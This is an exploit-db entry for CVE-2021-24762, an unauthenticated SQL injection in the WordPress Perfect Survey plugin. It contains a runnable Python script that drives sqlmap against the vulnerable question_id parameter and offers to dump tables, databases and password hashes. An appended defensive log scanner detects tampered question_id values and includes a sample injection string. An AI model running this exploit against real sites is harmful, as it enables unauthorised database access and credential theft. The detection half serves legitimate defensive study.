WordPress Plugin Perfect Survey – 1.5.1 – SQLi (Unauthenticated)

  • Author: Ron Jost
    Date: 2022-02-21
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50766/
    # Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated)
    # Date: 18.02.2022
    # Exploit Author: Ron Jost (Hacker5preme)
    # Vendor Homepage: https://www.getperfectsurvey.com/
    # Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip
    # Version: < 1.5.2
    # Tested on: Ubuntu 20.04
    # CVE: CVE-2021-24762
    # CWE: CWE-89
    # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md
    
    '''
    Description:
    The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before
    using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
    '''
    
    import argparse
    from datetime import datetime
    import os
    
    banner = '''
    
     ____ _______ ____ ____ ____ ___ ______________________
     _(___)_ (_) (_)(______)_(____) (____)_(____) (___)_(____)(_)(_)(_______)(_____) _(____) 
    (_) (_)(_) (_)(_)________(_) _(_)(_)(_)(_) _(_)(_)(_) ______(_) _(_)(_)(_)__(_)_ _(_)(_)___(_) _(_) 
    (_)_ (_) (_)(____)(______) _(_)(_)(_)_(_) (_)(______) _(_)(________)_(_)(_____)__(_) 
    (_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___(_)(_)___(_) (_)(_)___(_)(_)___
    (___)(___)(______) (______) (____) (______) (_) (______) (_)(_)(_____)(______) 
     
     
    								[+] Perfect Survey - SQL Injection
    								[@] Developed by Ron Jost (Hacker5preme)
    
    '''
    print(banner)
    
    # User input: target host, port and the WordPress base path (with trailing slash, e.g. /wordpress/)
    my_parser = argparse.ArgumentParser(description='Perfect Survey - SQL-Injection (unauthenticated)')
    my_parser.add_argument('-T', '--IP', type=str, required=True, help='target host or IP address')
    my_parser.add_argument('-P', '--PORT', type=str, required=True, help='target port')
    my_parser.add_argument('-U', '--PATH', type=str, required=True, help='WordPress base path, with trailing slash')
    args = my_parser.parse_args()
    target_ip = args.IP
    target_port = args.PORT
    wp_path = args.PATH
    
    print('[*] Starting Exploit at: ' + datetime.now().strftime('%H:%M:%S'))
    print('[*] Payload for SQL-Injection:')
    # The trailing "*" marks the injection point (the unescaped question_id parameter) for sqlmap
    exploitcode_url = 'sqlmap "http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" '
    print('Sqlmap options:')
    print(' -a, --all        Retrieve everything')
    print(' -b, --banner     Retrieve DBMS banner')
    print(' --current-user   Retrieve DBMS current user')
    print(' --current-db     Retrieve DBMS current database')
    print(' --passwords      Enumerate DBMS users password hashes')
    print(' --tables         Enumerate DBMS database tables')
    print(' --columns        Enumerate DBMS database table columns')
    print(' --schema         Enumerate DBMS schema')
    print(' --dump           Dump DBMS database table entries')
    print(' --dump-all       Dump all DBMS databases tables entries')
    retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
    exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0'
    os.system(exploitcode)
    print('Exploit finished at: ' + datetime.now().strftime('%H:%M:%S'))
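As an added example (not part of the exploit-db entry above), the script below shows the detection side of the same flaw: it scans web server access logs in the common combined format for requests to the get_question AJAX action whose question_id is anything other than a plain integer, which is exactly the input a fixed plugin would reject. The log lines and the regex for the combined format are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed pattern for the fields of an Apache/nginx "combined" log line that we need
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def inspect_request(url):
    """Return a finding for a get_question request whose question_id is not
    a bare integer (the only value the plugin should accept); None otherwise."""
    parts = urlsplit(url)
    if not parts.path.endswith('/wp-admin/admin-ajax.php'):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %xx once, as PHP does
    if params.get('action', [''])[0] != 'get_question':
        return None
    if 'question_id' not in params:
        return None
    qid = params['question_id'][0]
    if re.fullmatch(r'\d+', qid):
        return None  # legitimate use: a numeric question id
    return {'question_id': qid}

def scan_log(lines):
    """Run inspect_request over every parsable log line and collect findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = inspect_request(m['url'])
        if finding:
            finding.update(ip=m['ip'], ts=m['ts'], status=m['status'])
            findings.append(finding)
    return findings

# Constructed sample log: one normal call, one tampered question_id, two unrelated requests
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Feb/2022:10:00:01 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=get_question&question_id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Feb/2022:10:00:02 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=get_question&question_id=1%27%20OR%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.6"',
    '198.51.100.7 - - [21/Feb/2022:10:00:03 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/Feb/2022:10:00:04 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"[!] {f['ts']} {f['ip']} status={f['status']} question_id={f['question_id']!r}")
```

Because parse_qs decodes the query once, the check sees the same value the plugin would have interpolated into its SQL statement.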